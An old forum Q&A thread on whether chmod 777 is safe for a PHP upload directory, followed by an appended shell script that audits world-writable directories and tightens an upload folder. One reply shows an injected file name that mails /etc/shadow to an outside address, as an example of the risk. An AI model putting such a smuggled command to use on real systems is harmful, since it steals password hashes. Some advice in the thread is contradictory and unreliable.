Is it safe to chmod to 777 on a vps or dedicated server?

Posted on 2006-06-01
Last Modified: 2008-03-10
Hi,
I'm writing an upload app. in php. The uploaded files are moved and checked by php. But my client is on a shared hosting provider.
In order for php to move the files to the right folder, that folder needs to be chmod'ed to 777. I have been googling and found many people saying chmod 777 isn't safe on a shared host.
I was wondering if chmod 777 poses any security problem if the application would be hosted on a vps or dedicated server?

kind regards,
Peter
Question by:petervanlaer
9 Comments
 
LVL 11

Accepted Solution

by:
kblack05 earned 1200 total points
ID: 16808623
Permissions mask 0777 is *always* dangerous because it means that anyone can read/write/execute files within that directory structure. Typically this is a managed risk, and if you must have these kinds of features it's good to investigate using the SUID features...

Have a look at this thread, it's pretty descriptive:

http://www.linuxforums.org/forum/servers/17786-working-my-way-around-0777-issue-would-suid-guid-help.html
0
 

Author Comment

by:petervanlaer
ID: 16809253
As far as I understand it, *everyone* having permission doesn't include the average Joe on the internet, but only everyone who has an account or access to that machine.

If the machine:

* is on a shared hosting solution
* has anon FTP access or a number of other entry points the general public can use
* is a workstation that many people log into

then 777 is a bad idea. Right?

Feel free to correct any inaccuracies in the above; I'm not a Unix guru by any stretch of the imagination, but it's my understanding 777 doesn't just mean some random Joe can laser all yer stuff if they don't have an account of some sort on the machine.
0
 
LVL 11

Expert Comment

by:kblack05
ID: 16809307
Well, here's the gist of it: if the perms are wide open, anything CAN and DOES happen. For example some hotshot out there may notice, and use your upload input bin to add special characters, such as "filetoupload.txt; sendmail user@domain.com < /etc/shadow" or some other perversion.

If you aren't rigorously verifying input in your PHP script, the Apache server may possibly be made to work against you.
0
 
LVL 11

Expert Comment

by:kblack05
ID: 16809328
Or rather, they may be able to upload some arbitrary scripting, and then escape the php line to run the script, and possibly hose the box, or trojan it.
0
 
LVL 16

Expert Comment

by:xDamox
ID: 16809409
Hi,

777 permission is not secure :( on any machine. When you run your PHP script it runs as that user, so I think a directory permission of 755 will be OK for your PHP script.
0
 
LVL 11

Expert Comment

by:kblack05
ID: 16809530
He's running an upload program. It needs write access.
0
 
LVL 16

Expert Comment

by:xDamox
ID: 16809602
Hi,

Yeah, but the PHP script is probably running with his permissions, so a file at 755 should be sufficient, as he has read, write and execute whereas the others only have read and execute.
0
 
LVL 16

Expert Comment

by:xDamox
ID: 16809620
Sorry, just double checked mine; you will need 777 on uploads.
0
 
LVL 51

Expert Comment

by:ahoffmann
ID: 16824403
Simple question, simple answer: no.
0
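The thread circles around one fact without quite stating it: whether an upload directory needs 0755, 0775 or 0777 depends only on which account the PHP interpreter runs as relative to the directory's owner and group. The script below is an added example, not code from the thread or from any of the posters. It does the two things a defender actually wants here: audit a document root for directories whose "other" write bit is set (which is what 0777 grants to every local account, not just to the web server), and narrow an upload directory to owner-only write once it belongs to the PHP account. The directory tree, the `uploads`/`cache`/`includes` names and the optional owner argument are constructed for the demonstration; on shared hosting, where you can neither `chown` nor pick the PHP user, no mode bit fixes this and the answer is a per-user PHP setup (suEXEC or FastCGI) from the host.

```shell
#!/bin/sh
# Added example, not code from the thread. Audits a web tree for directories
# that any local account can write to (what 0777 grants) and narrows an
# upload directory to owner-only write. The tree and paths are constructed.

# Print, one per line and sorted, every directory under $1 whose "other"
# write bit is set. Paths are relative to $1 (e.g. ./uploads). This is the
# check to run after every deploy; -perm -0002 is POSIX find syntax.
world_writable_dirs() {
    ( cd "$1" && find . -type d -perm -0002 | sort )
}

# Exit 0 if the single directory $1 is world-writable, 1 otherwise.
is_world_writable() {
    find "$1" -prune -type d -perm -0002 | grep -q .
}

# Narrow an upload directory so only its owner can write (0700 on a directory:
# read, write and search for the owner, nothing for anyone else; use 0750 plus
# chgrp if a separate web-server account must read the files). This only helps
# when the owner is the account PHP runs as; pass that account as $2 (a
# placeholder such as www-data) to chown it first, which needs root.
harden_upload_dir() {
    dir=$1
    owner=${2:-}
    if [ -n "$owner" ]; then
        chown "$owner" "$dir" || return 1
    fi
    chmod 0700 "$dir"
}

# Build a constructed document root in a temp directory and print its path:
# uploads at 0777 (the thread's question), cache at 0775, includes at 0755.
make_demo_tree() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/uploads" "$root/cache" "$root/includes" || return 1
    chmod 0777 "$root/uploads" || return 1
    chmod 0775 "$root/cache" || return 1
    chmod 0755 "$root/includes" || return 1
    printf '%s\n' "$root"
}

# Demo run: scan, harden the upload directory, rescan, clean up.
demo_root=$(make_demo_tree)
echo "world-writable before: $(world_writable_dirs "$demo_root")"
harden_upload_dir "$demo_root/uploads"
echo "world-writable after:  '$(world_writable_dirs "$demo_root")'"
rm -rf "$demo_root"
```

Run it as the account that owns the web tree; the first scan reports `./uploads` and the second reports nothing. Note that 0775 on `cache` is not flagged: group write is only as safe as the group's membership, so pair the scan with a look at which accounts share the web server's group.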
